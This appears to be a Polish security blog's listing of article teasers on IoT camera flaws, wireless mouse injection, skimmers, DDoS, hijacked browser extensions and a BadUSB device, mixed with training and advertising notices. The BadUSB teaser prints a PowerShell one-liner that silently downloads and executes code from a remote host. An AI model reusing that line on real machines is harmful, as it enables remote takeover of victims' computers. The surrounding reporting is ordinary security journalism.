Na początek, czym jest ów waporyzator? Coś co potrafi odparować np. tytoń (nie ma tutaj klasycznego spalania – zatem mamy mniej trujących substancji), a niektórym służy np. do stopniowego rzucania palenia. Nowoczesne sprzęty mają (oczywiście) możliwość sterowania z aplikacji mobilnej. A ta z kolei komunikuje się urządzeniem, korzystając z Bluetooth…

Właśnie odświeżyliśmy nasze warsztaty z bezpieczeństwa aplikacji webowych i mamy tu dla Was najbardziej rozbudowaną ścieżkę szkoleniową, dostępną w Polsce :-) Z tej okacji proponujemy promocję – uczestnictwo we wszystkich trzech szkoleniach, w cenie dwóch. Jeszcze inaczej – to połowa ceny szkolenia u jednej z naszych konkurencji.

Dla osób nie będących w temacie, tytuł może być nieco dziwny. Co ma mysz bezprzewodowa do przejmowania komputera? Odsyłam więc do opracowania firmy Bastille z 2016 roku, gdzie pokazano, że dongle które używamy z bezprzewodowymi myszami, w wielu przypadkach akceptują również podłączenie bezprzewodowej klawiatury. Dodajmy jeszcze brak szyfrowania radiowej komunikacji i…

O skimmerach pisaliśmy już wiele razy. Inwencja przestępców jednak się nie kończy – zobaczcie kilka kolejnych przykładów:

Tym razem będzie krótko – przedmiotem moich badań jest tym razem kamera Bosch FlexiDome IP micro 2000. Trochę ekwilibrystyki (o której w następnym odcinku), i można za pomocą odpowiedniego, nieuwierzytelnionego requestu HTTP zrzucać zawartość pamięci z działającej kamery. Taki haertbleed – tylko bez https ;) W pamięci jak wiadomo, można…

Tym razem wzięliśmy na warsztat kamerę Ganz Security – model ZN-M2F (cena to około 2500 zł). Udało nam się tam uzyskać uprawnienia root bez uwierzytelnienia.

Krótkie ataki o przepustowości 300Gbps, powtarzane w niewielkich odstępach. Dlaczego atakujący stosują tak nietypową technikę? Prawdopodobnie jest to optymalizacja działania botnetów. W tym scenariuszu można równolegle zaatakować wiele celów, a często po otrzymaniu kilkominutowej paczki ruchu 300Gbps, ofiara podnosi się długo (np. po wypełnieniu całej pamięci operacyjnej, uruchomieniu swap, itp.)…

BBC opisuje garść ataków dotykających firmy spedycyjne (shipping companies), wśród których warto zwrócić na co najmniej jeden. Mianowicie omawiany jest przypadek instalacji malware w średniej wielkości firmie spedycyjnej. Malware wg cytowanego opisu przechwytywał e-maile z / do działu księgowego i podmieniał numery rachunków kont. Przykładowo, dostawca paliwa pisze maila z…

Uszkodziłeś ekran w swoim telefonie – to w obecnych czasach nie problem. Kilka dni w serwisie i telefon jest jak nowy :-) A nawet lepszy – nowy ekran może mieć backdoora. Jakoś wszyscy przywykli chyba do tego, że dostęp fizyczny ~=  przejęcie urządzenia. Ale z drugiej strony,  niewiele osób zastanawia…

Firma Proofpoint donosi o kolejnych rozszerzeniach do Chrome, które zostały przejęte. A bardziej precyzyjnie – przejęte zostały konta osób tworzących rozszerzenia, po czym do oficjalnego sklepu Google z rozszerzeniami została wgrana zainfekowana wersja. Pisaliśmy niedawno o historii z The Web Developer (ponad 1 000 000 instalacji), a Proofpoint wskazuje na kolejne zainfekowane rozszerzenia:…

Pisaliśmy już wiele razy o naszym nowym projekcie, czyli rozwal.to premium. Co ma być tutaj w przeciwieństwie do „zwykłego” rozwal.to? Po pierwsze – dostępna teoria do każdej grupy zadań; będą tu też zadania mocno nietypowe – jak np. hackowanie WebSocketów czy zabawy z OAuth2.0 Po drugie – zadania, dla których…

Opis przygotowania pendrive, który po podłączeniu działa jak klawiatura. Klawiatura ta z kolei wpisuje zaprogramowaną wcześniej sekwencję klawiszy – np. uruchamia powershella i daje zdalny dostęp na docelowy komputer. Np. tak: Keyboard.println(„powershell.exe -nop -w hidden -c $C=new-object net.webclient;$C.proxy=[Net.WebRequest]::GetSystemWebProxy();$C.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $C.downloadstring(’http://1.2.3.4:8080/’);”); Keyboard.write(KEY_RETURN); Sercem projektu jest produkt „Adafruit Trinket – Mini Microcontroller” –…

O shodanie pisaliśmy już wiele razy. Tym razem popatrzcie co udało nam się namierzyć (to nieuwierzytelniona sesja VNC):

Po 3,5 roku działalności sekuraka otwieramy się na zewnętrzną reklamę. Garść statystyk: W lipcu 2017r. zanotowaliśmy wejścia z około 225 000 unikalnych adresów IP (dane z analizy logów webserwera) Nasze profile śledzi około 34 000 osób (Facebook + Twitter + Wykop) Mamy zarejestrowanych około 6000 kont na siostrzanym serwisie –…

Ostatnio media obiegła dość interesująca informacja o możliwości zsyntetyzowania takiego DNA, które da wykonanie kodu na maszynie, która służy do sekwencjonowania DNA  (czyli w pewnym uproszczeniu poznania ciągu liter – odpowiadającym czterem parom nukleotydowym – wchodzących w skład DNA). Autorzy piszą w swojej pracy tak: We demonstrate, for the first time, the…